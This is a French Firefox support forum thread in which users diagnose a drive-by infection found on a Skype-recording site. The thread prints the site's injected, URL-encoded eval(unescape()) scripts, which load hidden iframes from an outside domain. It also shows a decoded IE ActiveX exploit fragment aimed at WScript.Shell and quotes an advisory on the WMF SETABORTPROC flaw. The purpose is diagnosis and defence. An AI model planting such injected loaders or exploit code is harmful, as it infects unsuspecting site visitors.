Firefox 2 joue mal, crainte de spyware : eval(unescape(

[arsunt]

Bonjour,

Je surfais innocemment sur /!\

Code : Tout sélectionner

http://www.skyperec.com/

/!\ (attention, je poste car j'ai eu un problème !), venant du site officiel de skype.com partie extras pour trouver un programme pour enregistrer des conversations Skype.

Mais en allant sur ce site, je vois le disque gratté à fond, la mémoire virtuelle monté d'un coup à plus de 500 Mo pour firefox.exe (version 2.0) et tout se figer. Une fenêtre apparait me demandant si je voulais bien enregistrer un .wmf chez moi et tout se fige.
Je kill le process de Windows XP et je recommence.

Une alerte de sécurité Windows me prévient que mon pare feu windows SP2 est désactivé. Je me dis, c'est pas normal !

Alors je regarde le code du site et voilà ce qu'il y a en bas :

Code : Tout sélectionner

</TABLE>
</BODY>
</HTML>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%34%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script><script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%30%35%34%2f%6e%65%77%33%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script><script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%34%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script><script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%30%35%34%2f%6e%65%77%33%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

Qu'est-ce que c'est que ce double eval(unescape( ?
Ai-je été infecté par un truc ?
Pourquoi Firefox est vulnérable à ce genre de bêtises ?

Je précise que je suis sous Wifi, ce qui n'est pas si facile à déconnecter en cas de soucis.

Merci d'avance

Message envoyé avec : Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) Gecko/20061010 Firefox/2.0

[myahoo]

Pourrais-tu éditer ton message, pour que le lien ne soit pas direct ?
En le mettant entre les champs [code] et [/code], par exemple.

[jpj]

Bonsoir,

Pas vraiment capable de te répondre mais tu peux déjà vérifier avec les outils signalés ici:
http://www.geckozone.org/forum/viewtopi ... 293#220293

Traduction de ce script:

Code : Tout sélectionner

<script>eval(unescape('document.write('<iframe src=http://wsfgfdgrtyhgfd.net/adv/new.php?adv=54 width=1 height=1></iframe>');'));</script><script>eval(unescape('document.write('<iframe src=http://wsfgfdgrtyhgfd.net/adv/054/new3.php width=1 height=1></iframe>');'));</script><script>eval(unescape('document.write('<iframe src=http://wsfgfdgrtyhgfd.net/adv/new.php?adv=54 width=1 height=1></iframe>');'));</script><script>eval(unescape('document.write('<iframe src=http://wsfgfdgrtyhgfd.net/adv/054/new3.php width=1 height=1></iframe>');'));</script>

Ça ne dit rien qui vaille mais pour savoir ce qui se cache derrière?

A+

[calimo]

Intéressant…
Dans la première iframe il y a ça :

Code : Tout sélectionner

function Exploit() {
        var i = 0;
        var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);
        
        while (t[i]) {
                var a = null;
                
                if (t[i].substring(0,1) == '{') {
                        a = document.createElement("object");
                        a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
                } else {
                        try { a = new ActiveXObject(t[i]); } catch(e){}
                }
                
                if (a) {
                        try {           
                                var b = CreateO(a, "WScript.Shell");
                                if (b) {
                                        Log('Loaded ' + t[i]);
                                        Go(a);
                                        return(0);
                                }
                        } catch(e){}
                }
                i++;
        }
        Log('');
}

Manifestement c'est un exploit pour IE (il y a du ActiveX et du WScript.Shell) le nom de la fonction veut tout dire.

Le reste c'est tout du code "échappé" pas très lisible.


Je te conseille de :

1. dénoncer cet annonceur auprès du webmaster de skyperec.com ;
2. dénoncer skyperec.com sur le site de skype pour qu'il enlève le lien de ce site dangereux.

Aucune companie n'aime avoir son nom associé à ce genre de choses louches.

Cela dit, ça n'explique pas le comportement de Firefox
Il faudrait voir le reste du code échappé. S'ils arrivent à lancer le windows media player, il n'y a aucune raison qu'ils ne puissent pas l'utiliser pour faire des choses peu avouables.

En attendant, passe un bon gros coup d'antispyware

Message envoyé avec : Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1) Gecko/20061010 Firemarsupilami Firefox/2.0

[Roger34]

Bonjour,

Je surfais innocemment sur /!\

Code : Tout sélectionner

http://www.skyperec.com/

/!\ (attention, je poste car j'ai eu un problème !), venant du site officiel de skype.com partie extras pour trouver un programme pour enregistrer des conversations Skype.

Mais en allant sur ce site, je vois le disque gratté à fond, la mémoire virtuelle monté d'un coup à plus de 500 Mo pour firefox.exe (version 2.0) et tout se figer. Une fenêtre apparait me demandant si je voulais bien enregistrer un .wmf chez moi et tout se fige.
Je kill le process de Windows XP et je recommence.

Une alerte de sécurité Windows me prévient que mon pare feu windows SP2 est désactivé. Je me dis, c'est pas normal !

Alors je regarde le code du site et voilà ce qu'il y a en bas :

Code : Tout sélectionner

</TABLE>
</BODY>
</HTML>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%34%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script><script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%30%35%34%2f%6e%65%77%33%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script><script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%34%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script><script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%30%35%34%2f%6e%65%77%33%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

Qu'est-ce que c'est que ce double eval(unescape( ?
Ai-je été infecté par un truc ?H
Pourquoi Firefox est vulnérable à ce genre de bêtises ?

Je précise que je suis sous Wifi, ce qui n'est pas si facile à déconnecter en cas de soucis.

Merci d'avance

Message envoyé avec : Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) Gecko/20061010 Firefox/2.0

Manifestement c'est un"exploit" :
MSOO6-01 WMF doublé d 'un malware:VBS Malware [gen] qui provoque l'"affolement" du cpu.Mon antivirus m'a arrêté ces manifestations en me demandant si je voulais détruire les fichiers infectés:ce que j'ai fait .Il faut donc écrire au webmaster du site pour qu'il enlève ces parasites nuisibles;c'est bien d'avoir retiré le lien direct URL de votre post.

[arsunt]

Merci de vos réponses ! Je n'en ai trouvé très peu d'autres sur internet à propos du nom de domaine de l'iframe.

Mais j'ai passé des antivirus, anti adware et vidé les caches tout le week end, rien n'a bougé sur mon ordinateur donc je suis rassuré.

Le webmaster du site m'a répondu :

Code : Tout sélectionner

I've already removed the virus, and I haven't any ideas how it's happened.

Il a enlevé le virus et ne comprend pas ce qui c'est passé.


Mais cela n'explique pas le comportement de Firefox. Moi qui croyais qu'il était sûr archi sûr


merci à tous

Message envoyé avec : Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) Gecko/20061010 Firefox/2.0

[calimo]

Il est sûr, mais du moment qu'il passe le contrôle au Windows Media Player…
il n'a aucun contrôle sur ce qui se passe dans les plugins

La solution est de remplacer WMP par quelque chose de mieux sécurisé

Message envoyé avec : Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8

[arsunt]

J'ai regardé dans about:plugins, il n'y a pas de plugins pour l'extension WMF ni dans Outils>Options>Contenu>Type de Fichiers

Ce qui me chagrine plus, c'est le quadruplement de la mémoire et de l'occupation du CPU qui n'est pas normal et non contrôlé par FF.

Message envoyé avec : Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) Gecko/20061010 Firefox/2.0

[jpj]

Bonjour,

WMF est un format de fichier (Windows MetaFile: format d'échange de dessin vectoriel) qui a eu son heure de gloire au début de l'année à cause d'une grosse faille de sécurité (http://www.geckozone.org/forum/viewtopic.php?t=33824 et http://www.geckozone.org/forum/viewtopic.php?t=37705).

Il n'y a pas de plugin, c'est un format pris en charge directement par Windows. Si le système est à jour, il n'y a aucun problème, la faille a été corrigé par Microsoft (très vite, c'est dire si le danger était bien réel). S'il y a eu une tentative ratée d'exploitation par activeX non pris en charge par Firefox et faille du système, il est assez normal que ce dernier perde les pédales.

A+

[calimo]

J'ai regardé dans about:plugins, il n'y a pas de plugins pour l'extension WMF ni dans Outils>Options>Contenu>Type de Fichiers

Non, en effet, c'est pourquoi je parlais de WMP avec un P comme player

Message envoyé avec : Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8

[arsunt]

Je comprends donc pas trop le lien entre Firefox et WMP dans mon cas précis, mais c'est pas grave

Message envoyé avec : Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) Gecko/20061010 Firefox/2.0

[jpj]

Bonsoir,

C'est Roger34 qui a parlé d'un"exploit" : MSOO6-01 WMF doublé d 'un malware:VBS Malware [gen] qui provoque l'"affolement" du cpu. D'après son message, il a été sur le site et c'est son antivirus qui lui a signalé ça mais il ne donne pas plus de précision.

A+

[calimo]

Je comprends donc pas trop le lien entre Firefox et WMP dans mon cas précis, mais c'est pas grave

Pour afficher une vidéo au format wmv ou similaire, sous Windows, c'est WMP qui est lancé par Firefox. Le lien me semble donc évident

Message envoyé avec : Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8

[arsunt]

Certes Calimo, mais là WMP n'agit en rien car c'est du format WMF.
WMF n'a rien à voir avec WMP, sous Firefox du moins car il n'y a pas de plugins pour lire les fichiers WMF de configuré chez moi.

Message envoyé avec : Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) Gecko/20061010 Firefox/2.0

[jpj]

Bonjour,

Je viens de relire ce fil et donc ton premier message où je n'avais pas vu qu'il était déjà question d'un WMF avec demande d'enregistrement sur le disque. Le plus probable est une tentative d'utilisation de la vieille faille de la dll shimgvw.dll

A vulnerability has been discovered in Microsoft Windows, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to an error in the handling of Windows Metafile files (".wmf") containing specially crafted SETABORTPROC "Escape" records. Such records allow arbitrary user-defined function to be executed when the rendering of a WMF file fails. This can be exploited to execute arbitrary code by tricking a user into opening a malicious ".wmf" file in "Windows Picture and Fax Viewer" or previewing a malicious ".wmf" file in explorer (i.e. opening a folder containing a malicious image file).

The vulnerability can also be exploited automatically when a user visits a malicious web site using Microsoft Internet Explorer.

NOTE: Exploit code is publicly available. This is being exploited in the wild. The vulnerability can also be triggered from explorer if the malicious file has been saved to a folder and renamed to other image file extensions like ".jpg", ".gif, ".tif", and ".png" etc.

The vulnerability has been confirmed on a fully patched system running Microsoft Windows XP SP2. Microsoft Windows 2000, Windows XP SP1 and Microsoft Windows Server 2003 SP0 / SP1 are also affected.

Il y avait déjà une faille précédente avec les WMF et la dll GDI32.DLL (http://secunia.com/advisories/17498/).

A+